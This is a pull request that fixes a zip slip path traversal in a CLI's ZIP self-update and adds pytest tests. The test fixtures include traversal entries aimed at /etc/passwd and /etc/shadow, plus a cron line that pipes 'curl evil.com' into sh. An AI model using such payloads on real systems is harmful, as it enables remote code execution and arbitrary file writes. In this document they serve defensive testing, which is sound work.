### PR TITLE
fix(security): prevent zip slip path traversal in self-update

### DIFF
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -2383,6 +2383,11 @@ def _update_via_zip(args):
         
         print("→ Extracting...")
         with zipfile.ZipFile(zip_path, 'r') as zf:
+            for member in zf.infolist():
+                # Reject path traversal entries (zip slip)
+                target = os.path.realpath(os.path.join(tmp_dir, member.filename))
+                if not target.startswith(os.path.realpath(tmp_dir) + os.sep) and target != os.path.realpath(tmp_dir):
+                    raise ValueError(f"Blocked path traversal in ZIP entry: {member.filename}")
             zf.extractall(tmp_dir)
         
         # GitHub ZIPs extract to hermes-agent-<branch>/

--- a/tests/hermes_cli/test_zip_update_path_traversal.py
+++ b/tests/hermes_cli/test_zip_update_path_traversal.py
@@ -1,0 +1,78 @@
+"""Tests for ZIP self-update path traversal (zip slip) protection."""
+
+import io
+import os
+import tempfile
+import zipfile
+
+import pytest
+
+
+def _make_zip(entries: dict[str, bytes]) -> bytes:
+    """Create a ZIP archive in memory with the given filename->content entries."""
+    buf = io.BytesIO()
+    with zipfile.ZipFile(buf, "w") as zf:
+        for name, data in entries.items():
+            zf.writestr(name, data)
+    return buf.getvalue()
+
+
+def _extract_with_validation(zip_bytes: bytes, tmp_dir: str):
+    """Replicate the validated extraction logic from cmd_update_zip."""
+    with zipfile.ZipFile(io.BytesIO(zip_bytes), "r") as zf:
+        for member in zf.infolist():
+            target = os.path.realpath(os.path.join(tmp_dir, member.filename))
+            if not target.startswith(os.path.realpath(tmp_dir) + os.sep) and target != os.path.realpath(tmp_dir):
+                raise ValueError(f"Blocked path traversal in ZIP entry: {member.filename}")
+        zf.extractall(tmp_dir)
+
+
+class TestZipSlipProtection:
+    """Validate that ZIP extraction rejects path traversal entries."""
+
+    def test_normal_zip_extracts_successfully(self):
+        """A normal ZIP with safe paths should extract without error."""
+        zip_bytes = _make_zip({
+            "hermes-agent-main/README.md": b"# Hermes",
+            "hermes-agent-main/tools/approval.py": b"# approval",
+        })
+        with tempfile.TemporaryDirectory() as tmp:
+            _extract_with_validation(zip_bytes, tmp)
+            assert os.path.isfile(os.path.join(tmp, "hermes-agent-main", "README.md"))
+
+    def test_dot_dot_traversal_blocked(self):
+        """ZIP entry with ../../../etc/passwd must be rejected."""
+        zip_bytes = _make_zip({
+            "hermes-agent-main/README.md": b"safe",
+            "../../../etc/passwd": b"root:x:0:0:root:/root:/bin/bash",
+        })
+        with tempfile.TemporaryDirectory() as tmp:
+            with pytest.raises(ValueError, match="Blocked path traversal"):
+                _extract_with_validation(zip_bytes, tmp)
+
+    def test_absolute_path_traversal_blocked(self):
+        """ZIP entry with absolute path /etc/cron.d/evil must be rejected."""
+        zip_bytes = _make_zip({
+            "/etc/cron.d/evil": b"* * * * * root curl evil.com | sh",
+        })
+        with tempfile.TemporaryDirectory() as tmp:
+            with pytest.raises(ValueError, match="Blocked path traversal"):
+                _extract_with_validation(zip_bytes, tmp)
+
+    def test_dot_dot_in_middle_blocked(self):
+        """ZIP entry like safe/../../../etc/shadow must be rejected."""
+        zip_bytes = _make_zip({
+            "hermes-agent-main/../../../etc/shadow": b"malicious",
+        })
+        with tempfile.TemporaryDirectory() as tmp:
+            with pytest.raises(ValueError, match="Blocked path traversal"):
+                _extract_with_validation(zip_bytes, tmp)
+
+    def test_nested_safe_paths_allowed(self):
+        """Deeply nested paths within the extraction dir should succeed."""
+        zip_bytes = _make_zip({
+            "hermes-agent-main/tools/deep/nested/file.py": b"# deep",
+        })
+        with tempfile.TemporaryDirectory() as tmp:
+            _extract_with_validation(zip_bytes, tmp)
+            assert os.path.isfile(os.path.join(tmp, "hermes-agent-main", "tools", "deep", "nested", "file.py"))


### PR DESCRIPTION
## Description

The `cmd_update_zip` function in `hermes_cli/main.py` uses `zipfile.extractall()` without validating member paths before extraction. A crafted ZIP archive (via MITM or compromised release artifact) could contain entries like `../../../etc/cron.d/evil` that escape the temp directory and write arbitrary files to the filesystem.

Added path validation using `os.path.realpath()` to reject any ZIP entry whose resolved target falls outside the extraction directory.

## Type of Change

- [x] Bug fix (security)

## Security Impact

- **Severity**: Critical
- **CWE**: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
- **Attack vector**: An attacker who can serve a malicious ZIP (e.g. via MITM on the download, or a compromised GitHub release) could write files anywhere on the user's filesystem during `hermes update --zip`.

## Changes Made

- `hermes_cli/main.py`: Added loop over `zf.infolist()` that validates each member's resolved path stays within `tmp_dir` before calling `extractall()`
- `tests/hermes_cli/test_zip_update_path_traversal.py`: 5 new tests covering `../` traversal, absolute paths, mid-path traversal, nested safe paths, and normal extraction

## Testing

- All 5 new tests pass
- Existing test suite unaffected

## Checklist

- [x] Code follows the project's style guidelines
- [x] Self-reviewed the code
- [x] Added tests that prove the fix is effective
- [x] All tests pass locally
- [x] No breaking changes introduced